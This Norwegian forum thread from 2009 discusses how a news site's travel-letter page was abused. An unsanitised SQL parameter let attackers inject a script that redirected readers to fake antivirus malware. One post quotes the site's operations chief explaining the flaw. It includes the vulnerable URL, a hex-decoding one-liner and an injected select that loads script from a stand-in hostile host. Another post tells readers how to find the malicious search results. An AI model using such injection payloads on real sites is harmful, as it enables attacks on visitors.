VG Nett misbrukt

[abene]

VG Nett ble i går misbrukt til å lure leserne til å laste ned skadelig programvare.

 

Les mer

[Theo343]

Kan noen forklare hva slags feil VG egentlig har gjort? Dette er jo egentlig bare masse viss-vass uten noe konkret informasjon.

[tjomi]

Kan noen forklare hva slags feil VG egentlig har gjort? Dette er jo egentlig bare masse viss-vass uten noe konkret informasjon.

 

Denne linken forklarer det.

http://en.wikipedia.org/wiki/SQL_injection

[tommyb]

Nja, den forklarer egentlig ikke hva saken egentlig er. Jeg vet hva SQL Injection er og gjør, men når google blandes inn her, henger ikke forklaringa helt på greip.

[>Jonas<]

Kan noen forklare hva slags feil VG egentlig har gjort? Dette er jo egentlig bare masse viss-vass uten noe konkret informasjon.

Slik jeg forstår det har det vært et sikkerhetshull i SQL-databsen til VG som har gjort det mulig for angripere å videresende lesere ved bruk av SQL injection. Det VG ikke har gjort er å tette dette sikkerhetshullet tidligere.

[Sajkow]

Så skal man være passe hjernelobotomert for å faktisk installere et slikt påtrengende program...

[oslo72]

Er man hjernelobotomert hvis man ønsker å installere et antivirus-program når man får beskjed om at pc'n er infisert? Kalles heller normalt folkevett - DERSOM man er en vanlig pc-bruker og ikke en Hardware.no-leser

 

EDIT: Er det andre steder enn i hjernen man kan bli lobotomert?

Endret 6. mai 2009 av oslo72

[BearCat]

De som er litt tøffe, eller har et godt antivirus program kan sette følgende inn i et google søk:

vg reise chicago select

og trykke enter.

 

 

Hos meg, med FF og Avast, kommer det opp en advarsel allerede sammen med søkeresultatet.

Advarselen gjelder et javascript, som åpner maskinen for ytterligere angrep,

uten at man nødvendigvis er lobotomert...

[Svish]

Er det andre steder enn i hjernen man kan bli lobotomert?

 

Hehe, nei, tror ikke det er så mange steder *i* hjernen heller for den saks skyld

[JohndoeMAKT]

Her er hva som skjedde:

Noen greide å få google til å indeksere et request mot en applikasjon hos VG hvor den skadelige koden lå i selve requestet. Ingenting gikk inn i selve databasen, og det gjalt bare én applikasjon av veldig mange som ikke vasket et inputparameter fra bruker. Siden ingenting gikk inn i databasen måtte du komme fra ett av disse requestene som google hadde indeksert for å få den ondsinnede koden.

 

Så denne trådens tittel om at "VG Nett misbrukt" stemmer mye bedre enn andres "VG Nett hacket".

Endret 6. mai 2009 av JohndoeMAKT

[Tosha0007]

Som vanleg får eg berre legge ut ein link til veiledningen dersom nokon er, eller i det minste trur dei er, infisert

[THx1138]

edit:

en annen sak..

Endret 6. mai 2009 av THx1138

[ricmik]

Det var vel snakk om Google Jacking?

 

http://en.wikipedia.org/wiki/Page_hijackin..._Google_jacking

[Smooth Ceiling]

Tenk på

[DarkSlayer]

prepared statements?

[Hrodebert]

Rampunger. '2' innlegg slettet og reaksjoner vil utstedes.

 

[BearCat]

Da mitt siste innlegg, hvor jeg linket direkte til bloggen til

Audun Ytterdal, driftsjef i VG Multimedia,

ble borte, så skal jeg quote hva som skjedde ifølge han:

 

Jeg fikk en telefon fra Watchcom som hadde funnet ut at noen kreative individer der ute på internett

benyttet seg av en feil på siden http://www.vg.no/reise/reisebrev.php?id=1 til å lure folk via søk på google til å installere et antivirusprodukt som egentlig var et virus

 

Hvordan fungerte det egentlig?

 

Reisebrev-applikasjonen var dessverre ikke kvalitetssikret godt nok før vi la det ut julen 2007

 

Variablen “id” her ble brukt direkte i en sql-spørring uten å bli “vasket” først. (dvs å passe på at “id” kun er et tall og ikke noe annet)

 

Det resulterte i at koden forsøkte å kjøre en sql-spørring og putte inn hva enn du skrev bak id=

 

Her kommer kreativiteten inn. Det lot seg ikke gjøre å legge inn data in databasen, men det gav muligheten til litt kreativ selecting og få resultatet ut på siden.

 

Klikk her for å se den orginale URL’en (Kan trigge antivirussoftwaren din)

 

http://pastebin.com/f7f7a573b

 

(jeg måtte legge det ekstern, hvis ikke ville folk få virusvarsel fra triggerhappy antivirussoftware hver gang folk kom inn på meta.vgb.no)

 

Mysql oversetter variabler som begynner med 0x til string automatisk. Her er en liten perlsnutt som gjør det samme:

 

$ echo 0x6672656520796fe756e67206769726c20706f726e |perl -lne 'print map {chr(hex($_))} /(..)/g'

 

free young girls porn

 

Så det er i praksis det samme som å si:

 

select 0,"free young girl porn",0,0,1,...."<script src="http://slemsite.com/slemtscript.php"></script>",0,1,.... from tabell"

 

Resultatet var at den første testsnutten ble vist på våre sider, og den andre som er javascript ble kjørt. Den lastet ned et slemt javascript fra en en ekstern site, som når det ble kjørt sendte deg til en annen ekstern. Der ble du fortalt at du hadde virus og forsøkte ganske aggressivt å få deg til å installere et antivirusprodukt som egentlig selv var et virus.

Hvordan fikk de folk til å besøke denne siden?

 

I og med at denne javascriptkoden kun blir kjørt hvis du encoder den inn i URL’en, og aldri befant seg på noen av VG’s maskiner, måtte de ha en måte å få folk til å klikke på slike linker.

 

De de da gjorde var å legge ut slike linker på mange steder rundt på internett. Etterhvert plukket Google og andre søkemotorer opp disse URL’ene og man fikk plutselig muligheten til å gjøre søk av type “reisebrev brazil free young girl porn” og få opp treff på de slemme URL’ene.

 

Det var aldri på noe tidspunkt en lenke til disse på VG Netts egne sider.

Endret 6. mai 2009 av BearCat

[Rascal]

De som er litt tøffe, eller har et godt antivirus program kan sette følgende inn i et google søk:

vg reise chicago select

og trykke enter.

 

 

Hos meg, med FF og Avast, kommer det opp en advarsel allerede sammen med søkeresultatet.

Advarselen gjelder et javascript, som åpner maskinen for ytterligere angrep,

uten at man nødvendigvis er lobotomert...

 

Så hvis jeg trykker linken og ingenting skjer med mitt AV program så fungerer AV programmet ikke? Eller er det fikset allerede?

[Theo343]

Kan noen forklare hva slags feil VG egentlig har gjort? Dette er jo egentlig bare masse viss-vass uten noe konkret informasjon.

Slik jeg forstår det har det vært et sikkerhetshull i SQL-databsen til VG som har gjort det mulig for angripere å videresende lesere ved bruk av SQL injection. Det VG ikke har gjort er å tette dette sikkerhetshullet tidligere.

Jeg også vet hva en SQL injection er og fikk med meg dens rolle i artikkelen, men VG har i grunn ikke gjort noe direkte feil her. Saken er at de har unngått å oppdatere eller ikke har hatt ressurser nok til god nok drift, som gjelder de fleste i dag har jeg inntrykk av. Endret 6. mai 2009 av Theo343

[BearCat]

Dersom ingenting trigges i ditt AV program, så håper jeg at de har ordnet problemet,

ellers så er ikke ditt AV program brukbart

du skal som sagt få en advarsel dersom AV programmet oppdager noe snusk.

 

ps.

jeg får ikke lenger opp ovennevnte advarsel, noe som tyder på at problemet er fikset.

Endret 6. mai 2009 av BearCat